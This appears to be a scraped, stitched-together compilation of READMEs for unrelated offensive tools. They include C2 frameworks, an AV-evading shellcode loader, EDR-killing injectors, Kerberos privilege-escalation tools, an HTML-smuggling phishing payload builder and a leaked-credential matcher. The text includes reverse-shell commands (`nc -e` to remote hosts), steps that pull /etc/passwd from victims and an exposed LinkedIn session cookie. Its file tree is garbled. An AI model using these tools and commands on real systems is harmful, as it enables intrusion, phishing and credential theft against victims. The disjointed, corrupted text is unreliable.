[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:
Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run i mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at
li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.
Now that the module is configured, you can run it and start gathering information from the company:
We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:
emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15
Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:
An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.
Once the torrent has been completelly downloaded you will get a file folder as following:
รขโลรขโโฌรขโโฌ count_total.sh
รขโลรขโโฌรขโโฌ data
รขโโ รขโลรขโโฌรขโโฌ 0
รขโโ รขโลรขโโฌรขโโฌ 1
รขโโ รขโโ รขโลรขโโฌรขโโฌ 0
รขโโ รขโโ รขโลรขโโฌรขโโฌ 1
รขโโ รขโโ รขโลรขโโฌรขโโฌ 2
รขโโ รขโโ รขโลรขโโฌรขโโฌ 3
รขโโ รขโโ รขโลรขโโฌรขโโฌ 4
รขโโ รขโโ รขโลรขโโฌรข&โฌ 5
รขโโ รขโโ รขโลรขโโฌรขโโฌ 6
รขโโ รขโโ รขโลรขโโฌรขโโฌ 7
รขโโ รขโโ รขโลรขโโฌรขโโฌ 8
รขโโ รขโโ รขโลรขโโฌรขโโฌ 9
รขโโ รขโโ รขโลรขโโฌรขโโฌ a
รขโโ รขโโ รขโลรขโโฌรขโโฌ b
รขโโ รขโโ รขโลรขโโฌรขโโฌ c
รขโโ รขโโ รขโลรขโโฌรขโโฌ d
รขโโ รขโโ รขโลรขโโฌรขโโฌ e
รขโโ รขโโ รขโลรขโโฌรขโโฌ f
รขโโ รขโโ รขโลรขโโฌรขโโฌ g
รขโโ รขโโ รขโลรขโโฌรขโโฌ h
รขโโ รขโโ รขโลรขโโฌรขโโฌ i
รขโโ รขโโ รขโลรขโโฌรขโโฌ j
รขโโ รขโโ รขโลรขโโฌรขโโฌ k
รขโโ รขโโ รขโลรขโโฌรขโโฌ l
รขโโ รขโโ รขโลรขโโฌรขโโฌ m
รขโโ รขโโ รขโลรข โฌรขโโฌ n
รขโโ รขโโ รขโลรขโโฌรขโโฌ o
รขโโ รขโโ รขโลรขโโฌรขโโฌ p
รขโโ รขโโ รขโลรขโโฌรขโโฌ q
รขโโ รขโโ รขโลรขโโฌรขโโฌ r
รขโโ รขโโ รขโลรขโโฌรขโโฌ s
รขโโ รขโโ รขโลรขโโฌรขโโฌ symbols
รขโโ รขโโ รขโลรขโโฌรขโโฌ t
At this point, you could import all those files with the command create_db
:
We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:
Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:
Or you con DM at @pastacls or @gaaabifranco on Twitter.
The tool was published as part of a research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation โ Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation โ Part 2"
PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.
Double-click the EXE binary and you will get the list of all named pipes.
We used Visual Studio to compile it.
When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:
Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File
We built the project and uploaded it so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjerManager package which is flagged as virus.
Note that James Forshaw talked about it here.
We can't change it because we depend on third-party DLL.
We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.
Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE
for more details.
For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.
Hades is a basic Command & Control server built using Python. It is currently extremely bare bones, but I plan to add more features soon. Features are a work in progress currently.
This is a project made (mostly) for me to learn Malware Development, Sockets, and C2 infrastructure setups. Currently, the server can be used for CTFs but it is still a buggy mess with a lot of things that need ironed out.
I am working on a Web UI using Flask currently so new features are being put on hold until then, if you face any issues then please be sure to create an issues request.
Listener Commands
---------------------------------------------------------------------------------------
listeners -g --generate --> Generate Listener
Session Commands
---------------------------------------------------------------------------------------
sessions -l --list --> List Sessions
sessions -i --interact --> Interact with Session
sessions -k --kill <value> --> Kill Active Session
Payload Commands
---------------------------------------------------------------------------------------
winplant.py --> Windows Python Implant
exeplant.py --> Windows Executable Implant
linplant.py --> Linux Implant
pshell_shell --> Powershell Implant
Client Commands
-------- -------------------------------------------------------------------------------
persist / pt --> Persist Payload (After Interacting with Session)
background / bg --> Background Session
exit --> Kill Client Connection
Misc Commands
---------------------------------------------------------------------------------------
help / h --> Show Help Menu
clear / cls --> Clear Screen
git clone https://github.com/lavender-exe/Hades-C2.git
cd Hades-C2
# Windows
python install.py
# Linux
python3 install.py
python3 hades-c2.py
python hades-c2.py
listeners -g / --generate
to generate a listenerwinplant.py
, linplant.py
or exeplant.py
See the open issues for a list of proposed features (and known issues).
Contributions are what make the open source community such an amazing place to be learn, inspire, and create. Any contributions you make are greatly appreciated.
git checkout -b feature/AmazingFeature
)git commit -m 'Add some AmazingFeature'
)git push origin feature/AmazingFeature
)Distributed under the MIT License. See LICENSE for more information.
Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
To clone and run this application, you'll need Git installed on your computer. From your command line:
# Clone this repository
$ git clone https://github.com/zerx0r/dvenom
# Go into the repository
$ cd dvenom
# Build the application
$ go build /cmd/dvenom/
After installation, you can run the tool using the following command:
./dvenom -h
To generate c# source code that contains encrypted shellcode.
Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.
./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs
Language | Supported Methods | Supported Encryption |
---|---|---|
C# | valloc, pinject, hollow, ntinject | xor, rot, aes256, rc4 |
Rust | pinject, hollow, ntinject | xor, rot, rc4 |
PowerShell | valloc, pinject | xor, rot |
ASPX | valloc | xor, rot |
VBA | valloc | xor, rot |
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
This project is licensed under the MIT License - see the LICENSE file for details.
Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.
GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.
Resource Category | Primary Module | Command Group | Operation | Description |
---|---|---|---|---|
User Authentication | auth | - | activate | Activate a Specific Authentication Method |
- | add | Add a New Authentication Method | ||
- | delete | Remove a Specific Authentication Method | ||
- | list | List All Available Authentication Methods | ||
Cloud Functions | functions | - | list | List All Deployed Cloud Functions |
- | permissions | Display Permissions for a Specific Cloud Function | ||
- | triggers | List All Triggers for a Specific Cloud Function | ||
Cloud Storage | storage | buckets | list | List All Storage Buckets |
permissions | Display Permissions for Storage Buckets | |||
Compute Engine | compute | instances | add-ssh-key | Add SSH Key to Compute Instances |
Python 3.11 or newer should be installed. You can verify your Python version with the following command:
python --version
git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install
pip install gator-red
Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!
If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:
Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.
Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.
Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.
Submit the Issue: After you've filled out all the necessary information, click Submit new issue.
Your feedback is important, and will help improve the tool. I appreciate your contribution!
I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.
Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.
I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.
Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!
Thank you for considering contributing to the project.
If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)
Commander is a command and control framework (C2) written in Python, Flask and SQLite. Itย comes with two agents written in Python and C.
Under Continuous Development
Not script-kiddie friendly
Python >= 3.6 is required to run and the following dependencies
Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt
First create the required certs and keys
# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes
Start the admin.py module first in order to create a local sqlite db file
python3 admin.py
Continue by running the server
python3 c2_server.py
And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.
# python agent
python3 agent.py
# C agent
gcc agent.c -o agent -lcurl -lb64
./agent
By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.
As the Operator/Administrator you can use the following commands to control your agents
Commands:
task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.
task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.
exit
Bye Bye!
Sessions:
sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is
Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P
The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.
Below you can find a normal flow diagram
In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.
More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.
Below is the flow diagram for this case.
To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.
# show all availiable agents
show agent all
To instruct all the agents to run the command "id" you can do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241
You can also change the interval of the agents that checks for tasks to 30 seconds like this:
# to set it for all agents
task add all c2-sleep 30
To open a session with one or more of your agents do the following.
# find the agent/uuid
show agent all
# enable the server to accept connections
sessions server start 5555
# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555
# display a list of available connections
sessions list
# select to attach to one of the sessions, lets select 0
sessions select 0
# run a command
id
# download the passwd file locally
download /etc/passwd
# list your files locally to check that passwd was created
local-ls
# upload a file (test.txt) in the directory where the agent is
upload test.txt
# return to the main cli
go back
# check if the server is running
sessions server status
# stop the sessions server
sessions server stop
If for some reason you want to run another external session like with netcat or metaspolit do the following.
# show all availiable agents
show agent all
# first open a netcat on your machine
nc -vnlp 4444
# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444
This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.
The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding
Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py
You can run it like this:
python3 obfuscator.py
# and to run the agent, do as usual
python3 obs_agent.py
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
pip install pyinstaller
pyinstaller --onefile agent.py
The binary can be found under the dist directory.
In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened
Create new certs in each engagement
Backup your c2.db, it is easy... just a file
pytest was used for the testing. You can run the tests like this:
cd tests/
py.test
Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data
To check the code coverage and produce a nice html report you can use this:
# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html
Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.
(Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.
To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.
Important to also note that the fully undetected part refers to the loading of the shellcode, however, the shellcode will still be subject to behavior monotoring, thus make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz which features DInvoke instead of Mimikatz).
.\RecycledInjector.exe <path_to_shellcode_file>
This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.
On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.
Spoofy
is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"
Well, Spoofy is different and here is why:
- Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
- Accurate bulk lookups
- Custom, manually tested spoof logic (No guessing or speculating, real world test results)
- SPF lookup counter
ย
Spoofy
requires Python 3+. Python 2 is not supported. Usage is shown below:
Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]
Install Dependencies:
pip3 install -r requirements.txt
(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here
The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.
After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.
This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end userโs responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.
Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley
DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf
Logo: cobracode
Tool was inspired by Bishop Fox's project called spoofcheck.
Escalate Service Account To LocalSystem via Kerberos.
Friends familiar with the "Potato" series of privilege escalation should know that it can elevate service account privileges to local system privileges. The early exploitation techniques of "Potato" are almost identical: leveraging certain features of COM interfaces, deceiving the NT AUTHORITY\SYSTEM account to connect and authenticate to an attacker-controlled RPC server. Then, through a series of API calls, an intermediary (NTLM Relay) attack is executed during this authentication process, resulting in the generation of an access token for the NT AUTHORITY\SYSTEM account on the local system. Finally, this token is stolen, and the CreatePr ocessWithToken()
or CreateProcessAsUser()
function is used to pass the token and create a new process to obtain SYSTEM privileges.
In any scenario where a machine is joined to a domain, you can leverage the aforementioned techniques for local privilege escalation as long as you can run code under the context of a Windows service account or a Microsoft virtual account, provided that the Active Directory hasn't been hardened to fully defend against such attacks.
In a Windows domain environment, SYSTEM, NT AUTHORITY\NETWORK SERVICE, and Microsoft virtual accounts are used for authentication by system computer accounts that are joined to the domain. Understanding this is crucial because in modern versions of Windows, most Windows services run by default using Microsoft virtual accounts. Notably, IIS and MSSQL use these virtual accounts, and I believe other applications might also employ them. Therefore, we can abuse the S4U extension to obtain the service ticket for the domain administrator account "Administrator" on the local machine. Then, with the help of James Forshaw (@tiraniddo)'s SCMUACBypass, we can use that ticket to create a system service and ga in SYSTEM privileges. This achieves the same effect as traditional methods used in the "Potato" family of privilege escalation techniques.
Before this, we need to obtain a TGT (Ticket Granting Ticket) for the local machine account. This is not easy because of the restrictions imposed by service account permissions, preventing us from obtaining the computer's Long-term Key and thus being unable to construct a KRB_AS_REQ request. To accomplish the aforementioned goal, I leveraged three techniques: Resource-based Constrained Delegation, Shadow Credentials, and Tgtdeleg. I built my project based on the Rubeus toolset.
C:\Users\whoami\Desktop>S4UTomato.exe --help
S4UTomato 1.0.0-beta
Copyright (c) 2023
-d, --Domain Domain (FQDN) to authenticate to.
-s, --Server Host name of domain controller or LDAP server.
-m, --ComputerName The new computer account to create.
-p, --ComputerPassword The password of the new computer account to be created.
-f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer
object.
-c, --Command Program to run.
-v, --Verbose Output verbose debug information.
--help Display this help screen.
--version Display version information.
S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"
S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f
# First retrieve the TGT through Tgtdeleg
S4UTomato.exe tgtdeleg
# Then run SCMUACBypass to obtain SYSTEM privilege
S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"
ModuleShifting is stealthier variation of Module Stomping and Module overloading injection technique. It is actually implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders.
The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.
ModuleShifting, when used with shellcode payload, is performing the following operations:
When using a PE payload, ModuleShifting will perform the following operation:
ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and compared to Module Stomping and Module Overloading is stealthier because it decreases the amount of IoCs generated by the injection technique itself.
There are 3 main differences between Module Shifting and some public implementations of Module stomping (one from Bobby Cooke and WithSecure)
The differences between Module Shifting and Module Overloading are the following:
Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory and at the moment generating zero IoC on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what is enabling more stealthiness in the injection is the shellcode functional independence, so that the written malicious bytes can be restored to its original content, effectively erasing the traces of the injection.
All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.
This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.
ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.
git clone https://github.com/naksyn/Pyramid
python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.
A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.
Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.
Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...
A quick guide of how to install and use Apepe.
1. git clone https://github.com/oppsec/Apepe.git
2. pip install -r requirements.txt
3. python3 main -f <apk-file.apk>
A quick guide of how to contribute with the project.
1. Create a fork from Apepe repository
2. Download the project with git clone https://github.com/your/Apepe.git
3. cd Apepe/
4. Make your changes
5. Commit and make a git push
6. Open a pull request
๏ธ๏ต๏ธ Pinkerton is a Python tool created to crawl JavaScript files and search for secrets
A quick guide of how to install and use Pinkerton.
1. Clone the repository with: git clone https://github.com/oppsec/pinkerton.git
2. Install the libraries with: pip3 install -r requirements.txt
3. Run Pinkerton with: python3 main.py -u https://example.com
If you want to use pinkerton in a Docker container, follow this commands:
1. Clone the repository - git clone https://github.com/oppsec/pinkerton.git
2. Build the image - sudo docker build -t pinkerton:latest .
3. Run container - sudo docker run pinkerton:latest
pip3 install -r requirements.txt
A quick guide of how to contribute with the project.
1. Create a fork from Pinkerton repository
2. Clone the repository with git clone https://github.com/your/pinkerton.git
3. Type cd pinkerton/
4. Create a branch and make your changes
5. Commit and make a git push
6. Open a pull request
The full explanation what is HTML Smuggling may be found here.
The primary objective of HTML smuggling is to bypass network security controls, such as firewalls and intrusion detection systems, by disguising malicious payloads within seemingly harmless HTML and JavaScript code. By exploiting the dynamic nature of web applications, attackers can deliver malicious content to a user's browser without triggering security alerts or being detected by traditional security mechanisms. Thanks to this technique, the download of a malicious file is not displayed in any way in modern IDS solutions.
The main goal of HTMLSmuggler tool is creating an independent javascript library with embedded malicious user-defined payload. This library may be integrated into your phishing sites/email html attachments/etc. to bypass IDS and IPS system and deliver embedded payload to the target user system. An example of created javascript library may be found here.
Install yarn package manager.
Install dependencies:
yarn
Read help message.
yarn build -h
Modify (or use my) javascript-obfuscator options in obfuscator.js
, my preset is nice, but very slow.
Compile your javascript payload:
yarn build -p /path/to/payload -n file.exe -t "application/octet-stream" -c
Get your payload from dist/payload.esm.js
or dist/payload.umd.js
. After that, it may be inserted into your page and called with download()
function.
payload.esm.js
is used inimport { download } from 'payload.esm';
imports (ECMAScript standart).
payload.umd.js
is used in html script SRC andrequire('payload.umd');
imports (CommonJS, AMD and pure html).
A full example may be found here.
Import created script to html file (or insert it inline):
<head>
<script src="payload.umd.js"></script>
</head>
Call download()
function from body:
<body>
<button onclick="download()">Some phishy button</button>
</body>
Happy phishing :)
A full example may be found here.
Import created script to vue file:
<script>
import { download } from './payload.esm';
</script>
Call download()
function:
<template>
<button @click="download()">Some phishy button</button>
</template>
Happy phishing :)
Q: I have an error RangeError: Maximum call stack size exceeded
, how to solve it?
A: This issue described here. To fix it, try to disable splitStrings
in obfuscator.js
or make smaller payload (it's recommended to use up to 2ย MB payloads because of this issue).
Q: Why does my payload build so long?
A: The bigger payload you use, the longer it takes to create a JS file. To decrease time of build, try to disable splitStrings
in obfuscator.js
. Below is a table with estimated build times using default obfuscator.js
.
Payload size | Build time |
---|---|
525 KB | 53 s |
1.25 MB | 8ย m |
3.59 MB | 25ย m |
This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.
Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt
The Server panel will display all added server and basic information about the server such as: owned user, open port and if has been pwned.
After entering the server, An edit panel will appear. We can add new users found on the server, Found vulnerabilities and add relevant attain and files.
Users panel contains all found users from all servers, The users are categorized by permission level and type. Those details can be chaned by hovering on the username.
Files panel will display all the files from the current pentest. A team member can upload and download those files.
Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.
PreReport panel will contain all the screenshots from the current pentest.
Graph panel will contain all of the Users and Servers and the relationship between them.
APIs allow users to effortlessly retrieve data by making simple API requests.
curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
Pull from GitHub container registry.
git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
docker-compose up -d
Start/Stop the container
sudo docker-compose start/stop
Save/Load Redeye
docker save ghcr.io/redeye-framework/redeye:latest neo4j:4.4.9 > Redeye.tar
docker load < Redeye.tar
GitHub container registry: https://github.com/redeye-framework/Redeye/pkgs/container/redeye
git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
sudo apt install python3.8-venv
python3 -m venv RedeyeVirtualEnv
source RedeyeVirtualEnv/bin/activate
pip3 install -r requirements.txt
python3 RedDB/db.py
python3 redeye.py --safe
Redeye will listen on: http://0.0.0.0:8443
Default Credentials:
Neo4j will listen on: http://0.0.0.0:7474
Default Credentials:
Sidebar
flowchart
download.js
dropzone
Pictures and Icons
Logs
If you own any Code/File in Redeye that is not under MIT License please contact us at: redeye.framework@gmail.com
This POC is inspired by James Forshaw (@tiraniddo) shared at BlackHat USA 2022 titled โTaking Kerberos To The Next Level โ topic, he shared a Demo of abusing Kerberos tickets to achieve UAC bypass. By adding a KERB-AD-RESTRICTION-ENTRY
to the service ticket, but filling in a fake MachineID, we can easily bypass UAC and gain SYSTEM privileges by accessing the SCM to create a system service. James Forshaw explained the rationale behind this in a blog post called "Bypassing UAC in the most Complex Way Possible!", which got me very interested. Although he didn't provide the full exploit code, I built a POC based on Rubeus. As a C# toolset for raw Kerberos interaction and ticket abuse, Rubeus provides an easy interface that allows us to easily initiate Kerberos requests and manipulate Kerberos tickets.
You can see related articles about KRBUACBypass in my blog "Revisiting a UAC Bypass By Abusing Kerberos Tickets", including the background principle and how it is implemented. As said in the article, this article was inspired by @tiraniddo's "Taking Kerberos To The Next Level" (I would not have done it without his sharing) and I just implemented it as a tool before I graduated from college.
We cannot manually generate a TGT as we do not have and do not have access to the current user's credentials. However, Benjamin Delpy (@gentilkiwi) in his Kekeo A trick (tgtdeleg) was added that allows you to abuse unconstrained delegation to obtain a local TGT with a session key.
Tgtdeleg abuses the Kerberos GSS-API to obtain available TGTs for the current user without obtaining elevated privileges on the host. This method uses the AcquireCredentialsHandle
function to obtain the Kerberos security credentials handle for the current user, and calls the InitializeSecurityContext
function for HOST/DC.domain.com
using the ISC_REQ_DELEGATE
flag and the target SPN to prepare the pseudo-delegation context to send to the domain controller. This causes the KRB_AP-REQ in the GSS-API output to include the KRB_CRED in the Authenticator Checksum. The service ticket's session key is then extracted from the local Kerberos cache and used to decrypt the KRB_CRED in the Authenticator to obtain a usable TGT. The Rubeus toolset also incorporates this technique. For details, please refer to โRubeus โ Now With More Kekeoโ.
With this TGT, we can generate our own service ticket, and the feasible operation process is as follows:
